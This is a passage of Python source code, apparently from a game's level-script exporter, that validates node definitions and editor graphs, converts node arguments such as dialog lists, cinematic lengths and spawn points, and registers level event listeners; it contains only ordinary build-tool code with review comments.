class NoneValueError(Exception):
    """Raised when an argument that must have a value resolves to None.

    Carries the offending node id and argument-type id for error reporting.
    """
    def __init__(self, message, nodeID, argTypeID):
        # Record which node/arg triggered the error, then delegate the
        # message to the base Exception.
        self.nodeID = nodeID
        self.argTypeID = argTypeID
        super(NoneValueError, self).__init__(message)
class TypeMismatchError(Exception):
    """Raised when a runtime value does not match its declared editor type.

    Carries the offending node id and argument-type id for error reporting.
    """
    def __init__(self, message, nodeID, argTypeID):
        # Record which node/arg triggered the error, then delegate the
        # message to the base Exception.
        self.nodeID = nodeID
        self.argTypeID = argTypeID
        super(TypeMismatchError, self).__init__(message)
class Node(object):
    """One node of the activity graph, assembled from editor data plus its
    type definition (see generate_node_graph)."""
    def __init__(self):
        self.name = None        # human-readable name from the node definition
        self.nodeType = None    # UUID of the node-definition type
        self.args = {}          # argUUID -> {name, type, valueRef, order, ...}
        self.returns = {}       # returnUUID -> {name, type, valueRef, linked}
        self.eventLinks = {}    # event-returnUUID -> {name, links}
        self.preLinks = {}      # event-argUUID -> {name, links}
        self.funcs = {}         # event-argUUID -> bound action/function name
        self.nodeDef = None     # raw definition dict for this node type
    def is_node(self, nodeName, nodeType):
        """Return True iff this node matches both the given name and type.

        The original re-asserted the exact conditions already verified by the
        `if`; those redundant asserts are removed and the comparison is
        returned directly.
        """
        return self.name == nodeName and self.nodeType == nodeType
class Value(object):
    """A shared mutable slot for a runtime value.

    `idx` is the slot's storage index (assigned later), `value` holds the
    actual payload; both start unset.
    """
    def __init__(self):
        self.value = None
        self.idx = None
def num_events_in_args(nodeDef):
    """Count how many of a node definition's args are declared as 'Event'."""
    return sum(1 for argDef in nodeDef['args'] if argDef['type'] == 'Event')
def string_to_vec3(value):
    """Parse a literal like "Vec3(1,2,3)" into a 3-tuple of floats.

    Keeps the original assert-based validation: callers rely on an
    AssertionError (caught by their surrounding try/except) for bad input.
    """
    assert value[:5] == "Vec3("
    assert value[-1] == ")"
    x, y, z = (float(component) for component in value[5:-1].split(','))
    return (x, y, z)
def extract_multiple_string(value):
    """Split one CSV-formatted line into its list of string fields."""
    # csv.reader wants an iterable of lines, so wrap the single line in a list.
    reader = csv.reader(
        [value],
        delimiter=',',
        quotechar='"',
        quoting=csv.QUOTE_ALL,
        skipinitialspace=True,
    )
    return next(reader)
def validate_type(value, argType):
    """Check that a runtime value matches its declared editor type.

    Unknown type names (e.g. 'Event') are accepted as-is. The exact
    `type(...) ==` comparison is deliberate: it keeps bool values from
    passing the 'Int' check, unlike isinstance().
    """
    scalar_types = {'Int': int, 'Float': float, 'Bool': bool, 'String': str}
    expected = scalar_types.get(argType)
    if expected is not None:
        return type(value) == expected
    if argType == 'Vec3':
        # A Vec3 is a tuple of exactly three floats.
        return (type(value) == tuple and len(value) == 3 and
                all(type(component) == float for component in value))
    return True
def validate_def_data(defData):
    """Sanity-check node definition data.

    Verifies that every arg/return/node-name UUID is globally unique, that
    declared default values match their declared types, that query nodes
    never use Event slots (and their type names are capitalized), and that
    every Event arg on a non-query node is bound to an action/function.

    Raises AssertionError (after printing context) on the first violation.
    """
    from uuid import UUID
    uuidSet = set()
    for nodeDef in defData:
        for arg in nodeDef['args']:
            uuid = arg['name'][1]
            try:
                assert uuid not in uuidSet
            except Exception:
                print('Duplicate UUID !!! : ', uuid)
                raise
            assert UUID(uuid, version=4)
            uuidSet.add(uuid)
            if 'default' in arg:
                try:
                    value = arg['default']
                    if arg['type'] == 'Vec3':
                        value = string_to_vec3(value)
                    assert validate_type(value, arg['type'])
                except Exception:
                    print('Wrong default value type: ', arg)
                    raise
        for ret in nodeDef['returns']:
            uuid = ret['name'][1]
            try:
                assert uuid not in uuidSet
            except Exception:
                print('Duplicate UUID !!! : ', uuid)
                raise
            # NOTE(review): UUID format check is disabled for return UUIDs — confirm intentional.
            # assert UUID(uuid, version=4)
            uuidSet.add(uuid)
        uuid = nodeDef['name'][1]
        try:
            assert uuid not in uuidSet
        except Exception:
            print('Duplicate UUID !!! : ', uuid)
            raise
        # NOTE(review): UUID format check is disabled for node-name UUIDs — confirm intentional.
        # assert UUID(uuid, version=4)
        uuidSet.add(uuid)
    # NOTE: query-type nodes must not use Event
    # NOTE: type names must start with an uppercase letter
    for nodeDef in defData:
        if nodeDef.get('query', False):
            for arg in nodeDef['args']:
                assert arg['type'] != 'Event'
                assert 65 <= ord(arg['type'][0]) <= 90  # ASCII 'A'..'Z'
            for ret in nodeDef['returns']:
                assert ret['type'] != 'Event'
                assert 65 <= ord(ret['type'][0]) <= 90  # ASCII 'A'..'Z'
    # NOTE: a non-query node that defines an event must have a matching func
    for nodeDef in defData:
        if nodeDef.get('query', False):
            continue
        for arg in nodeDef['args']:
            if arg['type'] != 'Event':
                continue
            try:
                # BUGFIX: was `assert 'action' or 'function' in arg`, which is
                # always true (it asserts the truthy string 'action'). The
                # intended membership test matches generate_node_graph's
                # `argDef.get('action', None) or argDef.get('function')`.
                assert 'action' in arg or 'function' in arg
            except Exception:
                print('Def Error, event does not have func', nodeDef)
                raise
def validate_editor_data(editorData):
    """Assert the editor graph contains no duplicated edges.

    Two edges are duplicates when they connect the same output pin of
    the same start node to the same input pin of the same end node.
    """
    seen = set()
    for edge in editorData["edges"]:
        key = (edge["start"], edge["end"], edge["startItemId"], edge["endItemId"])
        assert key not in seen
        seen.add(key)
def generate_node_graph(defData, editorData):
    """Build runtime Node objects from node definitions plus one editor graph.

    defData    -- list of node definitions; re-keyed below by type UUID
    editorData -- the editor's {"nodes": [...], "edges": [...]} dict

    Returns a dict mapping editor node id -> Node.  Data flows between
    nodes by *sharing* Value instances, so object identity matters: any
    arg still pointing at the shared `defaultNoneValue` sentinel has no
    value.  Raises TypeMismatchError / NoneValueError / AssertionError
    on invalid graphs.
    """
    defData = {node['name'][1]: node for node in defData}
    nodes = {}
    # Shared sentinel: an arg whose valueRef *is* this object was never
    # given a value (neither hand-written nor wired from another node).
    defaultNoneValue = Value()
    # Phase 1: instantiate one Node per editor node and populate its
    # pins (returns/eventLinks from outputs, args/preLinks from inputs).
    for editorNode in editorData["nodes"]:
        node = Node()
        nodes[editorNode['id']] = node
        node.nodeType = editorNode['type']
        node.nodeID = editorNode['id']
        nodeDef = defData[node.nodeType]  # the definition dict for this node type
        node.name = nodeDef['name'][0]
        node.nodeDef = nodeDef
        for returnDef in nodeDef['returns']:
            returnType = returnDef['type']
            returnName = returnDef['name'][0]
            returnUUID = returnDef['name'][1]
            if returnType == 'Event':
                # Outgoing event pin: filled with links in phase 2.
                node.eventLinks[returnUUID] = {
                    'name': returnName,
                    'links': []
                }
            else:
                valueRef = Value()
                if 'value' in returnDef:
                    valueRef.value = returnDef['value']
                    assert validate_type(valueRef.value, returnType)
                node.returns[returnUUID] = {
                    'name': returnName,
                    'type': returnType,
                    'valueRef': valueRef,
                    'linked': False
                }
        for (order, argDef) in enumerate(nodeDef["args"]):
            argType = argDef['type']
            argName = argDef["name"][0]
            argUUID = argDef["name"][1]
            argOrder = order
            if argType == 'Event':
                # Incoming event pin: remember which callback to run.
                node.funcs[argUUID] = argDef.get('action', None) or argDef.get('function')
                node.preLinks[argUUID] = {
                    'name': argName,
                    'links': []
                }
            else:
                # TODO
                node.args[argUUID] = {
                    'name': argName,
                    'type': argType,
                    'valueRef': defaultNoneValue,
                    'order': argOrder,
                    'argDef': argDef,
                    'dataProvider': None,
                }
                # Hand-written value in the editor: the node becomes its
                # own dataProvider.
                if argUUID in editorNode['args']:
                    value = Value()
                    if argType == 'Vec3':
                        try:
                            value.value = string_to_vec3(editorNode['args'][argUUID])
                        except:
                            raise TypeMismatchError(
                                'validate_type Vec3 error, argName "%s", type of (%s) is not %s, def is %s' % (
                                    argName, value.value, argType, node.nodeDef), node.nodeID, argUUID)
                    else:
                        if editorNode['args'][argUUID] is None:
                            value = defaultNoneValue
                        else:
                            value.value = editorNode['args'][argUUID]
                    try:
                        assert validate_type(value.value, argType)
                    except:
                        raise TypeMismatchError(
                            'validate_type error, argName "%s", type of (%s) is not %s, %s, def is %s' % (
                                argName, value.value, argType, type(value.value), node.nodeDef), node.nodeID,
                            argUUID)
                    node.args[argUUID]['valueRef'] = value
                    node.args[argUUID]['dataProvider'] = node
    # Phase 2: wire the edges.  Event edges link event pins; data edges
    # make the end node's arg share the start node's return Value.
    for editorEdge in editorData["edges"]:
        startNode = nodes[editorEdge["start"]]
        endNode = nodes[editorEdge["end"]]
        if editorEdge['linktype'] == 'Event':
            assert editorEdge['endItemId'] in endNode.funcs
            startNode.eventLinks[editorEdge["startItemId"]]['links'].append({
                'node': endNode,
                'eventUUID': editorEdge['endItemId'],
                'funcID': endNode.funcs[editorEdge['endItemId']]
            })
            endNode.preLinks[editorEdge['endItemId']]['links'].append({
                'node': startNode,
                'eventUUID': editorEdge['startItemId']}
            )
        else:
            # NOTE: if an arg already carries a hand-written value, no
            # other node may also supply one.
            try:
                assert endNode.args[editorEdge["endItemId"]]['valueRef'] is defaultNoneValue
            except:
                print("endNode '%s', attribute '%s', value is '%s', which should be None" % (
                    endNode.name, endNode.args[editorEdge["endItemId"]]['name'],
                    endNode.args[editorEdge["endItemId"]]['valueRef'].value))
                raise
            assert endNode.args[editorEdge["endItemId"]]['dataProvider'] is None
            if startNode.nodeDef.get('query', False):
                endNode.preQueryNodes.append(startNode)
            endNode.args[editorEdge["endItemId"]]['valueRef'] = startNode.returns[editorEdge["startItemId"]]['valueRef']
            startNode.returns[editorEdge["startItemId"]]["linked"] = True
            endNode.args[editorEdge["endItemId"]]['dataProvider'] = startNode
            # NOTE: an 'Any' pin may connect to any type on the other
            # side; otherwise the two pin types must match exactly.
            assert endNode.args[editorEdge["endItemId"]]['type'] == startNode.returns[editorEdge["startItemId"]][
                'type'] or endNode.args[editorEdge["endItemId"]]['type'] == 'Any' or \
                   startNode.returns[editorEdge["startItemId"]]['type'] == 'Any'
    # Phase 3: final per-arg validation (None-ness, type, static-const).
    for node in nodes.values():
        for argUUID, arg in node.args.items():
            argDef = arg['argDef']
            argType = argDef['type']
            if argType == 'Event':
                continue
            argValueRef = arg['valueRef']
            argValue = arg['valueRef'].value
            if argValue is None:
                if argDef.get('valueCanBeNone', False):
                    pass
                else:
                    # A None value is only acceptable when another node
                    # will provide it at runtime.
                    try:
                        assert arg['dataProvider'] is not None
                        assert arg['dataProvider'] is not node
                    except:
                        raise NoneValueError('value error, argName "%s" of node [ %s ] can not be None' % (
                            argDef['name'][0], node.nodeDef['name'][0]), node.nodeID, argUUID)
            else:
                try:
                    assert validate_type(argValue, argType)
                except:
                    raise TypeMismatchError(
                        'validate_type error, argName "%s", type of (%s) is not %s, %s, def is %s' % (
                            argDef['name'][0], argValue, argType, type(argValue), node.nodeDef), node.nodeID,
                        argUUID)
            # ensureStaticConst args must be hand-written, never wired.
            if argDef.get('ensureStaticConst') and argValueRef is not defaultNoneValue:
                try:
                    assert arg['dataProvider'] is node
                except:
                    raise TypeMismatchError(
                        'validate_type error, value must be static const, argName "%s", type of (%s) is not %s, def is %s' % (
                            argDef['name'][0], argValue, argType, node.nodeDef), node.nodeID, argUUID)
    return nodes
def do_work(defData, editorData, byEditor, filename, is_city=None):
    """Convert one editor node graph into the runtime data table.

    Parameters:
        defData    -- raw node-definition list (decoded nodes.json)
        editorData -- one level script's editor data ({"nodes","edges"})
        byEditor   -- True when invoked from the editor; selects the
                      editor-facing key layout for each exported node
        filename   -- level name, used only in warning messages
        is_city    -- when True, node usages forbidden in city levels
                      raise Exception

    Returns {'nodes': [...], 'runTimeData': [...]}: a flat value table
    plus per-node entries that reference values by index.
    """
    nodeGraph = generate_node_graph(defData, editorData)
    # NOTE: the tricks below pre-convert string args into lists at
    # export time to avoid paying the conversion cost at runtime.
    for node in nodeGraph.values():
        if node.is_node('Random Select String', 'a6bfe777-df7c-484c-b16d-71259527dca4'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            # NOTE(review): the `is 0`/`is 1`/`is 2` comparisons in this
            # function rely on CPython small-int caching; `==` would be
            # the safe spelling.
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            value = extract_multiple_string(arg['valueRef'].value)
            assert len(value) > 0
            for v in value:
                if len(v) <= 0 or not isinstance(v, str):
                    print("Wrong value format in random_select_string", node)
                    raise EOFError
            arg['valueRef'].value = value
        elif node.is_node('Play SFX', '79e89d07-876e-4b9e-a00d-c3f1221582b6'):
            # Pre-convert the SFX arc from degrees to radians.
            degreeArg = node.args['34c3310e-4df4-403f-adda-d5786a4345f5']
            degreeArgValue = degreeArg['valueRef'].value
            if degreeArgValue is not None:
                arcArg = node.args['e5785ef1-3c37-402b-883d-20116aaa63c7']
                arcArg['valueRef'].value = degreeArgValue / 180.0 * math.pi
        elif node.is_node('Set Int Variable', "bf7eab3f-b0b2-426f-9ddc-355c930ec0e6"):
            assert len(node.args) is 2
            arg = node.args['d4444300-2f7a-4ea2-80a0-40ed7b393d78']
            if arg['dataProvider'] is node:
                assert type(arg['valueRef'].value) is int
        elif node.is_node('Set Variable', '7532929c-3d5e-4264-92cc-7f0b5c7ca0b7'):
            assert len(node.args) is 2
            arg = node.args['17ddb382-4d7f-47b4-a1f1-929bd74cf91e']
            assert arg['dataProvider'] is not node, "use 'Set XXX Variable' instead"
        elif node.is_node('Array Data(Int)', 'bf11a6e1-e92d-4cb9-80dd-0e3cd22f164a'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            # "1,2,3" -> [1, 2, 3]
            value = list(map(int, arg['valueRef'].value.split(',')))
            assert len(value) > 0
            arg['valueRef'].value = value
        elif node.is_node('Array Data(Float)', '800cdc88-c30e-4b7f-8d39-d3f3843e53df'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            value = list(map(float, arg['valueRef'].value.split(',')))
            assert len(value) > 0
            arg['valueRef'].value = value
        elif node.is_node('Array Data(String)', '400d6243-58e4-43e1-a1fc-34fa41a421ff'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            value = extract_multiple_string(arg['valueRef'].value)
            assert len(value) > 0
            for v in value:
                if len(v) <= 0 or not isinstance(v, str):
                    print("Wrong value format in random_select_string", node)
                    raise Exception
            arg['valueRef'].value = value
        elif node.is_node('Random Select Float', 'ca345a9f-56d9-4197-b6e3-1dfc65dfae0c'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            value = list(map(float, arg['valueRef'].value.split(',')))
            assert len(value) > 0
            arg['valueRef'].value = value
        elif node.is_node('Random Select Integer', '4e0fa583-7ba8-40d1-82d2-375d98b95500'):
            assert node.nodeDef['function']
            assert node.nodeDef['query'] is True
            assert num_events_in_args(node.nodeDef) is 0
            assert len(node.preQueryNodes) is 0
            assert len(node.args) is 1
            arg = next(iter(node.args.values()))
            assert arg['dataProvider'] is node
            value = list(map(int, arg['valueRef'].value.split(',')))
            assert len(value) > 0
            arg['valueRef'].value = value
        elif node.is_node('Open NPC Dialog', 'e0e5d422-f970-429b-8a62-7b5fcae3a5c4'):
            # Parse "text,id;text,id;..." into [[str, int], ...].
            arg = node.args.get('d10b29b5-7276-4df1-84ca-7fec5fc44b67', None)
            value = arg['valueRef'].value
            if value:
                talk_list = []
                for item in value.split(';'):
                    talk_item = item.split(',')
                    assert len(talk_item) == 2
                    talk_item[1] = int(talk_item[1])
                    talk_item[0] = str(talk_item[0])
                    talk_list.append(talk_item)
                arg['valueRef'].value = talk_list
        elif node.is_node('Open NPC Dialog(Only In Dungeon)', '32cff2f0-7157-4d59-a658-13fdbae44b6d'):
            # Same "text,id;..." parsing as 'Open NPC Dialog' above.
            arg = node.args.get('361036ea-5700-4e79-bed8-1c0a84c64f16', None)
            value = arg['valueRef'].value
            if value:
                talk_list = []
                for item in value.split(';'):
                    talk_item = item.split(',')
                    assert len(talk_item) == 2
                    talk_item[1] = int(talk_item[1])
                    talk_item[0] = str(talk_item[0])
                    talk_list.append(talk_item)
                arg['valueRef'].value = talk_list
        elif node.is_node('Play Cinematic', '8d21cbcb-287f-48f9-8aa9-71b9293a6348'):
            # Extract a numeric field (e.g. length = "1.5) from an anim
            # file line; returns 0 when the pattern is absent.
            # NOTE(review): the [:-1] slice drops the match's final
            # character; unless the regex was meant to also capture the
            # closing quote this truncates the last digit — verify
            # against the anim file format.
            def get_num(reg_str, prefix_len, line):
                index = re.search(reg_str, line)
                if index:
                    length = index.group(0)
                    length = length[prefix_len:-1]
                    return float(length)
                return 0
            path_arg = node.args.get('954cde6d-c8cc-4b61-bc48-19e0a0d60987', None)
            path = path_arg['valueRef'].value
            if path:
                # NOTE(review): resPath is read as a module-level name
                # here — confirm it is defined whenever do_work runs.
                anim_file = os.path.join(resPath, path)
                if os.path.exists(anim_file):
                    try:
                        anim_file_handle = open(anim_file, 'r')
                        lines = anim_file_handle.readlines()
                        length = get_num('''length = "[0-9.]*''', len('length = "'), lines[0])
                        if length:
                            # Total runtime = length + leading/trailing
                            # black time; stored as "path;length".
                            start_black_time = get_num('''start_black_time = "[0-9.]*''', len('start_black_time = "'),
                                                       lines[0])
                            length += start_black_time
                            end_black_time = get_num('''end_black_time = "[0-9.]*''', len('end_black_time = "'),
                                                     lines[0])
                            length += end_black_time
                            path_arg['valueRef'].value = path + ';' + str(length)
                        else:
                            print('Error: can not find length in ', anim_file)
                            # NOTE(review): bare `traceback` is a no-op
                            # expression — traceback.print_exc() was
                            # presumably intended (here and below).
                            traceback
                    except Exception as e:
                        print('Error: get anim length failed, ', anim_file, e)
                        traceback
                else:
                    print('Error: open anim_file failed, ', anim_file)
                    traceback
            player_id_arg = node.args.get('4407dd3a-9af0-46f3-a82d-ca47f5ed9b8a', None)
            if not player_id_arg.get('dataProvider') and is_city is True:
                raise Exception('Play Cinematic, but Player EntityID == None is forbid in city level!!')
        elif node.is_node('Start Unit Dialog Tips', '5c7c06b0-b06c-49b7-afaf-e2473cb12c10'):
            player_id_arg = node.args.get('9eef619e-0ffc-488a-89dd-276ba67dcdb5', None)
            player_id = player_id_arg['valueRef'].value
            if not player_id and is_city is True:
                raise Exception('Start Unit Dialog Tips, but Player EntityID == None is forbid in city level!!')
        elif node.is_node('Advance Task', '217dd054-8c6e-4976-bf3c-9defbc218c74'):
            for_all_players_arg = node.args.get('9ddf1c84-db67-421e-951c-4607821abdd8', None)
            for_all_players = for_all_players_arg['valueRef'].value
            if for_all_players and is_city is True:
                raise Exception('Advance Task, but \'For All Players\' == True is forbid in city level!!')
        elif node.is_node('Create Mechanism', 'f0f220b5-e584-4aff-8c86-f039d030c02b'):
            # Split the comma-separated list argument in place.
            arg = node.args.get('b6e0a54f-b5b2-11e5-8bb7-448a5b598860', None)
            value = arg['valueRef'].value
            if value:
                value = value.split(',')
                arg['valueRef'].value = value
        elif node.is_node('Create Mechanism With Lightmap', '03cfda15-a336-4c6c-b8a4-75123e88628d'):
            arg = node.args.get('cf1d99e2-a1b7-48e8-ad79-40014ef128bf', None)
            value = arg['valueRef'].value
            if value:
                value = value.split(',')
                arg['valueRef'].value = value
            # NOTE: export of the lightmap info (must be two fields).
            arg = node.args['6fd92e9d-7e74-414a-a662-c411aee4f19d']
            value = arg['valueRef'].value
            value = extract_multiple_string(value)
            assert len(value) == 2
            arg['valueRef'].value = value
        elif node.is_node('Set Enable Player Skills', '49c402b3-022a-47e8-8028-1401c78b332c'):
            arg = node.args.get('ea57e264-6569-4dba-8b0a-0995f1f0825c')  # Skill ID List
            value = list(map(int, arg['valueRef'].value.split(',')))
            assert len(value) > 0
            arg['valueRef'].value = value
    # Assign every node a dense index; the export addresses nodes by it.
    nodes = []
    idx = 0
    for node in nodeGraph.values():
        node.idx = idx
        nodes.append(None)
        idx += 1
    runTimeData = []
    # Finish converting all nodes before walking the graph again.
    trigger_grids_all = {}
    # Give every distinct Value one slot in the flat runtime table:
    # returns first, then args.  Values shared across pins keep a single
    # index (that is how data flows between nodes at runtime).
    for node in nodeGraph.values():
        for retUUID, value in node.returns.items():
            valueRef = value['valueRef']
            if valueRef.idx is None:
                idx = len(runTimeData)
                valueRef.idx = idx
                runTimeData.append(valueRef.value)
    for node in nodeGraph.values():
        for argUUID, value in node.args.items():
            valueRef = value['valueRef']
            if valueRef.idx is None:
                idx = len(runTimeData)
                valueRef.idx = idx
                runTimeData.append(valueRef.value)
    # Emit one export dict per node (layout depends on byEditor).
    for node in nodeGraph.values():
        # if len(node.preQueryNodes) > 0:
        #     preQueryNodes = [(preQueryNode.idx, preQueryNode.nodeDef['function']) for preQueryNode in
        #                      node.preQueryNodes]
        # else:
        #     preQueryNodes = None
        """
        # TODO: 缓存优化
        args = [ (value['order'], value['valueRef'].idx) for argUUID, value in node.args.iteritems() ]
        args.sort(key = lambda x : x[0])
        args = tuple([ value[1] for value in args ])
        """
        # TODO: Vector
        args = {value['name']: value['valueRef'].idx for argUUID, value in node.args.items()}
        returns = {value['name']: value['valueRef'].idx for _, value in node.returns.items()}
        # returns_linked = False
        # for retUUID, value in node.returns.items():
        #     returns.append((value['name'], value['valueRef'].idx))
        #     # returns_linked |= value['linked']
        # returns = tuple(returns)
        # eventLinks = {value['name']: {link['node'].idx: 'In' for link in value['links']} for
        #               eventUUID, value in node.eventLinks.items()}
        eventLinks = {value['name']: [(link['node'].idx, link['funcID']) for link in value['links']] for
                      eventUUID, value in node.eventLinks.items()}
        prelinks = {}
        for value in node.preLinks.values():
            # if value['links']:
            # NOTE(review): every event-in pin is mapped to the node's
            # *first* declared func — this assumes one Event arg per
            # node (or insertion order matching); verify for nodes with
            # several Event args.
            prelinks[value['name']] = [node.funcs[key] for key in node.funcs][0]
        if byEditor:
            nodes[node.idx] = {
                # 'preQueryNodes': preQueryNodes,
                'eventLinks': eventLinks,
                'args': args,
                'returns': returns,
                'preLinks': prelinks,
                'nodeUUidIdx': (node.nodeID, node.idx)
            }
        else:
            nodes[node.idx] = {
                # 'preQueryNodes': preQueryNodes,
                'event_actions': prelinks,
                'event_links': eventLinks,
                'inputs': args,
                'outputs': returns,
            }
        # if returns_linked:
        #     nodes[node.idx]['returns_linked'] = True
    # --- Special handling for externally-triggered events ---
    """
    针对外部事件的特殊处理
    """
    # Append a value to the runtime table and return its index.
    def append_runtime_data(value):
        runTimeData.append(value)
        return len(runTimeData) - 1
    # NOTE(review): the listener tables built below are not part of the
    # returned dict — presumably consumed by code outside this chunk or
    # left over from an earlier output format; verify before relying on
    # them.
    on_script_start = []
    on_player_load_scene_finish = []
    on_player_unit_dead = []
    levelEventListeners = {
        'on_script_start': on_script_start,
        'on_player_load_scene_finish': on_player_load_scene_finish,
        'on_player_unit_dead': on_player_unit_dead
    }
    clientEventListeners = {}
    taskEventListeners = {}
    activityStartListeners = {}
    levelTimesUseoutEventListeners = {}
    openPublicInstnaceEventListeners = {}
    # staticMechanisms = []
    questionEventListeners = []
    # Maps display arg names to the exported static-mechanism keys.
    STATIC_MECHANISM_PARAMS = {
        'Mechanism Config ID': 'mechanism_config_id',
        'Block Point': 'block_point',
        'Spawn Point': 'spawn_point',
        'Tile Index': 'tile_index',
        'Unit Type': 'unit_type'
    }
    autoCreatePlayerUnitNodeCount = 0
    setColorThemeNodeCount = 0
    BUILTIN_LEVEL_EVENTS = ['on_script_start', 'on_player_load_scene_finish', 'on_player_unit_dead']
    AddTaskDetailRequiredNames = {}
    CounterNames = {}
    # NOTE(review): never populated anywhere in this function (name is
    # also typo'd "blcok"), so the warning loop after this chain is
    # effectively dead.
    mechanism_with_blcok = set()
    has_opt_mechanism = set()
    # --- Per-node-type registration / validation chain ---
    for node in nodeGraph.values():
        if node.name == 'On Script Start' or node.nodeType == 'f8af0dbe-14b1-415d-bc91-5eb68bd2bd06':
            assert node.nodeType == 'f8af0dbe-14b1-415d-bc91-5eb68bd2bd06'
            assert node.name == 'On Script Start'
            assert node.nodeDef['function']
            assert num_events_in_args(node.nodeDef) is 0
            on_script_start.append((node.idx, node.nodeDef['function']))
        elif node.is_node("Create NPC", "83e7076d-9d00-4415-9e9f-d121c6d0d2e6"):
            # Without an explicit Position, a Spawn Point must be wired.
            if node.args['2c5d3d12-509f-45ce-ba8d-b8590c12739c']['dataProvider'] is None:  # Position
                arg = node.args['7032826b-37c5-4299-a172-2621c92ef289']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.is_node("Create Monster", "b8bdb1c4-48e3-4c7b-b38e-12aef4a29db0"):
            if node.args['ad60708a-4917-4fef-a193-9e1d62d2e8bd']['dataProvider'] is None:  # Position
                arg = node.args['33228f1d-1b7a-405d-82d4-7958acc8e8dc']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.is_node("Create Monster Boss", "f7454550-56f5-4242-86a8-9e46b140feab"):
            if node.args['8b062406-a831-4a43-baad-9c7bd65a84ef']['dataProvider'] is None:  # Position
                arg = node.args['40c74e07-8e28-4366-bd92-25e5d3c97dc7']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.is_node("Create Monster Avatar", "9d1d78e6-0591-4b88-b34f-2a6864252151"):
            if node.args['8dc0f1c1-188d-4e41-979f-737bda223697']['dataProvider'] is None:  # Position
                arg = node.args['2c74e5fd-8695-4bd2-aa71-9a28ff8ad5a6']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.is_node("Create Monster World Boss", "f7454550-56f5-4242-86a8-9e46b141feab"):
            if node.args['40c74e07-8e28-4366-bd92-25e5d3c97dc8']['dataProvider'] is None:  # Position
                arg = node.args['8b062406-a831-4a43-baad-9c7bd65a85ef']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.is_node("Create Mechanism", "f0f220b5-e584-4aff-8c86-f039d030c02b"):
            if node.args['cb7c120d-aa4d-4adc-8a09-20ecd5b539c0']['dataProvider'] is None:  # Position
                arg = node.args['b84f6f5c-695f-4b56-b98b-3bd61698bd3c']  # Spawn Point
                argValue = arg['valueRef'].value
                if argValue is None:
                    assert arg['dataProvider'] is not node
                    assert arg['dataProvider'] is not None
        elif node.name == 'On Level Loaded' or node.nodeType == 'e468c7df-0563-4f68-9c8f-daf2e77d08b7':
            assert node.name == 'On Level Loaded'
            assert node.nodeType == 'e468c7df-0563-4f68-9c8f-daf2e77d08b7'
            assert node.nodeDef['function']
            assert num_events_in_args(node.nodeDef) is 0
            on_player_load_scene_finish.append((node.idx, node.nodeDef['function']))
        elif node.is_node('Auto Create Player Unit', '02b886bc-365f-4913-bae0-3dbf270633f3'):
            # At most one such node per level.
            assert autoCreatePlayerUnitNodeCount == 0
            assert node.nodeDef['function']
            assert num_events_in_args(node.nodeDef) is 0
            autoCreatePlayerUnitNodeCount += 1
            on_player_load_scene_finish.append((node.idx, node.nodeDef['function']))
        elif node.is_node('Add Task Detail', '3d934991-fcfe-44f4-8129-35295f0e4393'):
            arg = node.args['8519ec91-87de-48a3-a049-47c107f7ac39']
            assert arg['name'] == 'Counter Name'
            name = arg['valueRef'].value
            assert not name in AddTaskDetailRequiredNames
            AddTaskDetailRequiredNames[name] = node
        elif node.is_node('Counter', '7035072e-0ca7-4ec4-b36b-0a25123386fe'):
            arg = node.args['fbed0f80-12ad-48a2-a3a3-e733ee0b6c01']
            assert arg['name'] == 'Name'
            name = arg['valueRef'].value
            if name is not None:
                assert not name in CounterNames
                CounterNames[name] = node
        elif node.is_node('Create Static Object', '9ed37096-bc78-47c9-b0d0-44fef1f8002d'):
            # NOTE: static object creation — parked here for now, to be
            # reorganized later.
            on_script_start.append((node.idx, 'create_static_object'))
        elif node.is_node('On Player Unit Dead', '95d00220-6cc5-4ecd-bbe7-73bbfbd827a7'):
            assert num_events_in_args(node.nodeDef) is 0
            on_player_unit_dead.append((node.idx, node.nodeDef['function']))
        elif node.name == 'On Level Event' or node.nodeType == '7c2ac230-a0dd-41a7-a3f3-c501cfce7e59':
            assert node.name == 'On Level Event'
            assert node.nodeType == '7c2ac230-a0dd-41a7-a3f3-c501cfce7e59'
            assert len(node.args) == 1
            eventName = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert eventName not in BUILTIN_LEVEL_EVENTS
            if eventName in levelEventListeners:
                levelEventListeners[eventName].append((node.idx, node.nodeDef['function']))
            else:
                levelEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'Response Server Event' or node.nodeType == '0a8f2f1b-1999-411c-b690-662924beef44':
            assert node.name == 'Response Server Event'
            assert node.nodeType == '0a8f2f1b-1999-411c-b690-662924beef44'
            assert len(node.args) == 1
            eventName = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
